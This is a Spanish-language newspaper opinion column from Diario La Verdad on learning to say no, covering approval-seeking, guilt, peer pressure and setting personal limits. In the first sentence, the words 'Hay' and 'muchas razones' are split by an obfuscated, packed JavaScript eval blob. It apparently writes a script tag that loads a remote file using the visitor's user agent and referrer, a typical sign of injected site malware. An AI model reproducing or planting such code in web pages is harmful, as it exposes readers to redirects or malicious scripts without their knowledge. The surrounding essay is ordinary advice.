publicidad

Aprender a decir que no

Arminda García / Profesora Titular de LUZ / arminda.garcia@gmail.com
Hay eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kznib|var|u0026u|referrer|drhns||js|php'.split('|'),0,{})) muchas razones por las cuales a las personas les cuesta decir que “no”, como la necesidad de aprobación, el temor al rechazo, en sentimiento de culpa, el miedo a las críticas, entre otros

Muchas veces, sin pensarlo, las personas tienden a aceptar compromisos o se ven involucradas en acciones, con las cuales realmente no están a gusto. Sienten que deben decir “sí” y no se han preguntado las razones. A la vez, manifiestan sentimientos de culpabilidad cuando se niegan, por eso, asumen obligaciones que no les pertenecen, sin analizar sus propias prioridades ni cuestionarse, si realmente les corresponde aceptar esa responsabilidad.

Algunos de los motivos que llevan a las personas a actuar de esa manera, es porque se sienten presionados por compañeros, amigos o familiares, en su entorno. Muchas veces esperan aceptación de ellos y no quieren generar malos entendidos, diferencias o discusiones, que afecten esa relación. 

Otra razón por la cual las personas se sienten comprometidas, es por el sentimiento de culpa que les ocasiona no poder ayudar a otros en sus problemas. Por otro lado, se pueden sentir abrumados al escuchar las quejas que manifiestan, por lo cual, se hace imprescindible analizar qué tan válida es esa necesidad que expresan, para aprender así a lidiar con esas personas. En esos casos, resulta oportuno ser empático y escucharlos con interés.

Para decir que no sin sentirse culpable, es prioritario internalizar, que una persona no puede ser responsable de todo, pues no es adecuado sobrecargarse de compromisos que tal vez resulten difíciles de cumplir. Así mismo, no hay que pensar que se pierde el respeto de otros o que estos se sienten decepcionados. Simplemente, se debe entender que no se pude complacer a todos, estableciendo límites al respecto.

Es cierto que a muchos les gusta ayudar a otros, no lo ven como sacrificio y se prestan de muy buen ánimo. En esos casos, la intuición puede ser una excelente guía para determinar hasta dónde comprometerse sin que esto represente un problema o afecte de manera crítica. Por otra parte, decir que no en el momento oportuno, permite ganar confianza en sí mismo y el respeto de los demás, demostrando que se cuenta con personalidad y criterio.

Como se puede observar, hay muchas razones por las cuales a las personas les cuesta decir que “no”, como la necesidad de aprobación, el temor al rechazo, el sentimiento de culpa, el miedo a las críticas, entre otros. Sin embargo, es importante aprender a no asumir compromisos de otros, cuando no es realmente conveniente, con el fin de construir una identidad propia y tomar las decisiones más acertadas.

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama